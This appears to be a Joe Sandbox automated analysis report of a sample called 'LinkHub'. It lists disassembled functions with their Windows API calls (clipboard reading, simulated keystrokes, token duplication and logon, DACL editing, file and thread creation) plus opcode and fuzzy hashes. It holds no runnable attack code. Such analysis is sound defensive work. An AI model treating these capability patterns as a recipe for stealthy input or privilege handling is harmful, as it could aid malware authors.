                                                                    Function 00CA4FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CA319C,00000001,00000364,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA5031
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 717c44580156893e77587d65bf9ac7565647454363bcb269967a20112108f6ca
                                                                    • Instruction ID: 4381c215a88fdd4146060541f4a5590eeceddc677b90b231175752305f12b950
                                                                    • Opcode Fuzzy Hash: 717c44580156893e77587d65bf9ac7565647454363bcb269967a20112108f6ca
                                                                    • Instruction Fuzzy Hash: 51F0BE36610F22A7DF312F669C09B5B3758AF437B4F14C022B828DB1A0DA20DA0196F0
                                                                    Function 00CA3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 7c46689f5ff5276213372921ee978f44b817940dce335c8b131d2c7d62e198a7
                                                                    • Instruction ID: 72bab9140dc142c690cd5f04a1b10969d98672d77221a3ab81363b54e15304e5
                                                                    • Opcode Fuzzy Hash: 7c46689f5ff5276213372921ee978f44b817940dce335c8b131d2c7d62e198a7
                                                                    • Instruction Fuzzy Hash: 34E0E5312007A26BDA222B73BC15F5A365AAF033E8F1401A1FC24D61A0CF20CF0092B0
                                                                    Function 00C766E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ce5c31cf42f4b2373cad9ff38dc59657418d141ef6c3ee1283c793257ca17ee
                                                                    • Instruction ID: 4bc63dfc99e7807e039a460375f0a5cad2a78532f656bd6731b4152ac7d652ed
                                                                    • Opcode Fuzzy Hash: 5ce5c31cf42f4b2373cad9ff38dc59657418d141ef6c3ee1283c793257ca17ee
                                                                    • Instruction Fuzzy Hash: 43F039B1105B02CFCB389F65D8A4856BBE4BF14369324C93EF1EA86610C7719840DF10
                                                                    Function 00C7684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 2638373210-0
                                                                    • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                    • Instruction ID: 6dc22c5959658742b64680d96b2bc518997c194fbb39edc57a3ff9e4a68163f4
                                                                    • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                    • Instruction Fuzzy Hash: DDF0F87550020DFFDF05DF90C941E9EBB79FB14318F208445F9159A151C336EA21ABA1
                                                                    Function 00C73907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00C73963
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_
                                                                    • String ID:
                                                                    • API String ID: 1144537725-0
                                                                    • Opcode ID: 91f818b9610dc29ea6cdef1ac5026895f5f46f9b9086aae18ab499acb38bfd3d
                                                                    • Instruction ID: ede234d3b66f029ff7fe95dcfb2ed75fdf3ad4fcb503802aee4a0d8b6392e74c
                                                                    • Opcode Fuzzy Hash: 91f818b9610dc29ea6cdef1ac5026895f5f46f9b9086aae18ab499acb38bfd3d
                                                                    • Instruction Fuzzy Hash: 0DF037709143549FEB629F64DC497967BFCA701708F0400E9B688D6281D7745788CF51
                                                                    Function 00C73A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C73A76
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath_wcslen
                                                                    • String ID:
                                                                    • API String ID: 541455249-0
                                                                    • Opcode ID: 7913ad6e92196bef73f3cc053d79f9d0d0876d827372e82f287b924dd5601be0
                                                                    • Instruction ID: fa484e07c5940fe59e11a8593561da09c087a0392a4084c2fa5a1ba58868e956
                                                                    • Opcode Fuzzy Hash: 7913ad6e92196bef73f3cc053d79f9d0d0876d827372e82f287b924dd5601be0
                                                                    • Instruction Fuzzy Hash: 4BE0CD7290022457CB10D2689C05FDE77DDDFC87A0F044171FD09D7254D960DD809590
                                                                    Function 00CDE83E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CDE857
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FolderPath_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2987691875-0
                                                                    • Opcode ID: c52a0e54ec917c67fa8ba8cfc48ec0a422fd53c11e7a72a5c1bd22ad83d0571c
                                                                    • Instruction ID: 60767b48325044a6130e23747540b9240d77fb98ed2f587485be3808ba363b03
                                                                    • Opcode Fuzzy Hash: c52a0e54ec917c67fa8ba8cfc48ec0a422fd53c11e7a72a5c1bd22ad83d0571c
                                                                    • Instruction Fuzzy Hash: ABD05EA19003282BEFA0E6749C0DDBB3AACC740210F0046A1786DD3152E930EE4486B0
                                                                    Function 00CE12EB Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00CE1306
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 58cfe851a45ccd8576bbda76351ee321c4d66dab3fe43a30d7a1b578e4391ad0
                                                                    • Instruction ID: bdae0388457144bf9fba57bce18139fdda03d3429125cb5ee9507e1f60c3d0d9
                                                                    • Opcode Fuzzy Hash: 58cfe851a45ccd8576bbda76351ee321c4d66dab3fe43a30d7a1b578e4391ad0
                                                                    • Instruction Fuzzy Hash: 20D05EB1422314BF9B2C8B52CD4ACA7769CEA01651340112EB802D2A40F5B0FD00CAB0
                                                                    Function 00CB071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00CB0A84,?,?,00000000,?,00CB0A84,00000000,0000000C), ref: 00CB0737
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 1165ec61d151f2185425fd3f6701675b7ebaecc52b1d6afe84d89651c4435f19
                                                                    • Instruction ID: ef711afe90fbfa38afcdefd8541edeb893612e9040c812471dbc8a86cd2bd1e3
                                                                    • Opcode Fuzzy Hash: 1165ec61d151f2185425fd3f6701675b7ebaecc52b1d6afe84d89651c4435f19
                                                                    • Instruction Fuzzy Hash: 39D06C3200020DBBDF028F84DD06EDA3BAAFB48714F014000BE1896120C732E821AB91

                                                                    Non-executed Functions

                                                                    Function 00C8FC7C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00C8FC86
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CCFCB8
                                                                    • IsIconic.USER32(00000000), ref: 00CCFCC1
                                                                    • ShowWindow.USER32(00000000,00000009), ref: 00CCFCCE
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00CCFCD8
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CCFCEE
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CCFCF5
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CCFD01
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CCFD12
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CCFD1A
                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00CCFD22
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00CCFD25
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CCFD3A
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00CCFD45
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CCFD4F
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00CCFD54
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CCFD5D
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00CCFD62
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CCFD6C
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00CCFD71
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00CCFD74
                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00CCFD9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: 69e0f5a0f6ffed038e4d2b71002511899a0b0517b7ad123c8fa5c3e57f37a18a
                                                                    • Instruction ID: 674226b0cceaebd783f239885fa0353d89321e6c61cce28c9cbc5acac8f22ca9
                                                                    • Opcode Fuzzy Hash: 69e0f5a0f6ffed038e4d2b71002511899a0b0517b7ad123c8fa5c3e57f37a18a
                                                                    • Instruction Fuzzy Hash: AF313271A403187EEB216BE59C49F7E7E6EEB44B50F10006AFA05E62D1D6B15D01AAB0
                                                                    Function 00CD1B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CD2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD205A
                                                                      • Part of subcall function 00CD2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD2087
                                                                      • Part of subcall function 00CD2010: GetLastError.KERNEL32 ref: 00CD2097
                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00CD1BD2
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00CD1BF4
                                                                    • CloseHandle.KERNEL32(?), ref: 00CD1C05
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CD1C1D
                                                                    • GetProcessWindowStation.USER32 ref: 00CD1C36
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00CD1C40
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CD1C5C
                                                                      • Part of subcall function 00CD1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CD1B48), ref: 00CD1A20
                                                                      • Part of subcall function 00CD1A0B: CloseHandle.KERNEL32(?,?,00CD1B48), ref: 00CD1A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 22674027-1027155976
                                                                    • Opcode ID: 653a67da55684bcab17b63035178906e00a9702fb9456f0e0d72f84f8d21cab4
                                                                    • Instruction ID: e73d777498883558f8399cf61d69b058731660ff8766136554de9a28cd259977
                                                                    • Opcode Fuzzy Hash: 653a67da55684bcab17b63035178906e00a9702fb9456f0e0d72f84f8d21cab4
                                                                    • Instruction Fuzzy Hash: B4812971900209BFDF119FA4DC49FEE7BBAEF04704F18411AFA25A62A0D7718A55DB60
                                                                    Function 00CD14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CD1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD1A60
                                                                      • Part of subcall function 00CD1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A6C
                                                                      • Part of subcall function 00CD1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A7B
                                                                      • Part of subcall function 00CD1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A82
                                                                      • Part of subcall function 00CD1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD1A99
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CD1518
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CD154C
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00CD1563
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00CD159D
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD15B9
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00CD15D0
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00CD15D8
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00CD15DF
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CD1600
                                                                    • CopySid.ADVAPI32(00000000), ref: 00CD1607
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CD1636
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CD1658
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CD166A
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD1691
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD1698
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD16A1
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD16A8
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD16B1
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD16B8
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00CD16C4
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD16CB
                                                                      • Part of subcall function 00CD1ADF: GetProcessHeap.KERNEL32(00000008,00CD14FD,?,00000000,?,00CD14FD,?), ref: 00CD1AED
                                                                      • Part of subcall function 00CD1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00CD14FD,?), ref: 00CD1AF4
                                                                      • Part of subcall function 00CD1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00CD14FD,?), ref: 00CD1B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: 8cb9ecc90f7057274e30d0ff938c746d4b31bd62d358c862ce2ae8623facb0ed
                                                                    • Instruction ID: 1bfc522bc24fab1ce485168521378690794e10e7c2c9f7beecf127daf04725cc
                                                                    • Opcode Fuzzy Hash: 8cb9ecc90f7057274e30d0ff938c746d4b31bd62d358c862ce2ae8623facb0ed
                                                                    • Instruction Fuzzy Hash: E8712CB1900209BBDF109FA5DC48FAEBBB9FF04350F184516FA29E6290D775DA06CB60
                                                                    Function 00CEF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenClipboard.USER32(00D0DCD0), ref: 00CEF586
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CEF594
                                                                    • GetClipboardData.USER32(0000000D), ref: 00CEF5A0
                                                                    • CloseClipboard.USER32 ref: 00CEF5AC
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00CEF5E4
                                                                    • CloseClipboard.USER32 ref: 00CEF5EE
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CEF619
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00CEF626
                                                                    • GetClipboardData.USER32(00000001), ref: 00CEF62E
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00CEF63F
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CEF67F
                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00CEF695
                                                                    • GetClipboardData.USER32(0000000F), ref: 00CEF6A1
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00CEF6B2
                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00CEF6D4
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00CEF6F1
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00CEF72F
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CEF750
                                                                    • CountClipboardFormats.USER32 ref: 00CEF771
                                                                    • CloseClipboard.USER32 ref: 00CEF7B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                    • String ID:
                                                                    • API String ID: 420908878-0
                                                                    • Opcode ID: b4643fb039808a976282daab9c2a6850a81d6edb5f2befae4d9fa7463d55ef96
                                                                    • Instruction ID: cfc7704659f9df2bdad7206cae7045d634ea3f4be96b42baacb98265ef47ed50
                                                                    • Opcode Fuzzy Hash: b4643fb039808a976282daab9c2a6850a81d6edb5f2befae4d9fa7463d55ef96
                                                                    • Instruction Fuzzy Hash: 2761F2352043419FD300EF65D888F6ABBA5EF84704F54856EF45AC72A2CB31DE46DB62
                                                                    Function 00CE73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CE7403
                                                                    • FindClose.KERNEL32(00000000), ref: 00CE7457
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CE7493
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CE74BA
